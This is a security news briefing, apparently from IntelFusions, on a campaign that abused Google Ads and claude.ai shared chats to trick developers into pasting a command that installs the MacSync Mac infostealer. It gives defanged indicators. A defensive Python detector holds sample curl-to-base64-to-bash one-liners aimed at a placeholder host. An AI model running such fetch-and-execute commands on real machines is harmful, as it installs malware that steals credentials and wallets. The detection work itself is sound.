Hackers abuse Google Ads and Claude chats to spread Mac malware

A long-running malvertising operation has found an unsettling new hiding place: Claude's own website. Researchers at TrendAI Research (Trend Micro) tracked a campaign that bought Google search ads for popular AI developer tools, then funneled more than 2,000 people toward pages that tricked them into pasting a malicious command, ultimately installing data-stealing malware. After weeks of using throwaway sites, the operators moved their lures onto claude.ai itself, abusing its shared chat feature so victims landed on a fully legitimate, trusted domain.

How the scam worked

The attackers ran Google Ads impersonating at least six brands, including Claude, ChatGPT Codex, Perplexity, Cursor and JetBrains, plus a parallel set of Mac "cleanup" tool scams. Anyone clicking an ad reached a page using ClickFix, a social engineering trick that talks the visitor into "fixing" a fake issue by copying a command into their terminal, the step that quietly runs the malware. Because many of the victims were developers hunting for AI tools, they were comfortable pasting commands, exactly the audience the crooks wanted.

Early waves hosted these pages on free GitLab Pages subdomains. The notable shift came when the operators began creating weaponized "shared chats" on claude.ai and pointed their ads straight at those URLs. Trend Micro's team reports the page carried a valid certificate on a trusted domain, so browser warnings, URL inspection and Safe Browsing-style checks saw nothing wrong.

What the malware does

The shared chats impersonated "Apple Support" and instructed Mac users to open Terminal and run a curl command piped through base64. The decoded script (reaching out to hxxps://loserrq0j1sha8[.]com/debug/loader[.]sh) first checks whether a Russian keyboard layout is present and, if not, downloads an infostealer the researchers call MacSync that harvests browser credentials and cookies, SSH keys and cryptocurrency wallet files before exfiltrating them.
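The command shape described above (a remote fetch whose output is base64-decoded and piped into a shell) is easy to spot in shell history or EDR command-line telemetry. The following detector is an added example written for this briefing, not code from Trend Micro's report or from IntelFusions; the sample history lines are constructed and `attacker.invalid` is a placeholder domain, not the campaign's infrastructure.

```python
"""Flag ClickFix-style one-liners in shell history or process command-line telemetry.

Added example written for this briefing; it is not code from Trend Micro's report.
The samples below are constructed, and 'attacker.invalid' is a placeholder domain.
"""
import re
from typing import List

# Patterns applied to each pipe-separated stage of a command line.
FETCH_RE = re.compile(r"^\s*(curl|wget)\b")
# base64 -d / --decode (GNU and current macOS) or -D (older macOS), or an openssl decode
DECODE_RE = re.compile(r"^\s*(base64\s+(-d|-D|--decode)|openssl\s+(base64|enc)\b.*\s-d)\b")
INTERP_RE = re.compile(r"^\s*(sudo\s+)?(bash|sh|zsh|python3?|osascript)\b")
# echo/printf of a long base64-looking blob (inline payload instead of a network fetch)
BLOB_RE = re.compile(r"^\s*(echo|printf)\s+['\"]?[A-Za-z0-9+/=]{40,}")
# fetch embedded in a command substitution, e.g. bash -c "$(curl ...)"
SUBST_FETCH_RE = re.compile(r"(\$\(|`)\s*(curl|wget)\b")


def stages(command: str) -> List[str]:
    """Label each pipe-separated stage of a one-liner."""
    labels = []
    for seg in command.split("|"):
        if FETCH_RE.search(seg):
            labels.append("fetch")
        elif DECODE_RE.search(seg):
            labels.append("decode")
        elif INTERP_RE.search(seg):
            # an interpreter whose argument pulls from the network is fetch+exec in one stage
            labels.append("exec+fetch" if SUBST_FETCH_RE.search(seg) else "exec")
        elif BLOB_RE.search(seg):
            labels.append("blob")
        else:
            labels.append("other")
    return labels


def is_clickfix_like(command: str) -> bool:
    """True when remote or inline content is piped (optionally via a decoder) into an interpreter."""
    s = stages(command)
    if "exec+fetch" in s:
        return True
    if "exec" not in s:
        return False
    upstream = set(s[: s.index("exec")])
    return bool(upstream & {"fetch", "blob", "decode"})


def scan(lines: List[str]) -> List[str]:
    """Return the command lines that match the ClickFix pattern."""
    return [line for line in lines if is_clickfix_like(line)]


# Constructed sample history: three benign developer commands, then three ClickFix-style ones.
SAMPLE_HISTORY = [
    "brew install node",
    "curl -sSL https://example.com/release-notes.txt -o notes.txt",
    "echo 'hello' | base64",
    "curl -fsSL https://attacker.invalid/debug/loader.sh | base64 -d | bash",
    "echo 'QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVowMTIzNDU2Nzg5' | base64 -D | sh",
    'bash -c "$(curl -fsSL https://attacker.invalid/x)"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_HISTORY):
        print("FLAGGED:", hit, "->", stages(hit))
```

Run it against `~/.zsh_history` or exported process-creation events rather than the inline samples to use it for real; the stage labelling is deliberately conservative so that a plain `curl -o file` or an `echo | base64` encode never fires on its own.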

Scale and targeting

Over roughly seven weeks the campaign cycled through 106 malicious hostnames across six waves, continually rotating infrastructure and testing new AI brand lures. The Asia Pacific region absorbed about 67 percent of confirmed victims, with Taiwan alone making up roughly 30 percent, pointing to deliberate geographic ad targeting rather than opportunistic spread. After TrendAI Research notified Anthropic, the company banned the accounts behind the shared chats, disabled the malicious conversations, and said it is adding further abuse mitigations for the feature. The campaign is part of a wider surge in paid ad abuse; criminals recently ran thousands of fake ad campaigns across Asia Pacific and stood up fake streaming sites to push scams and malware.

What you should do

Treat any "installation" that asks you to paste a command from a web page as hostile, even on a trusted domain like claude.ai or a gitlab.io address. Download developer tools only from the vendor's official site or an official package manager such as brew, pip or npm, and avoid clicking sponsored search results for software.

Indicators (defanged): hxxps://loserrq0j1sha8[.]com/debug/loader[.]sh?build=a39427f9d5bfda11277f1a58c89b7c2d, MacSync infostealer (MD5 a39427f9d5bfda11277f1a58c89b7c2d).

This briefing is provided by IntelFusions for informational and defensive purposes only. It is based on sources assessed to be reliable at the time of writing, and analytic judgments carry the confidence levels indicated. Indicators of compromise are defanged; re-arm them only in controlled environments. IntelFusions is not affiliated with the organizations named and makes no warranty as to completeness or accuracy.
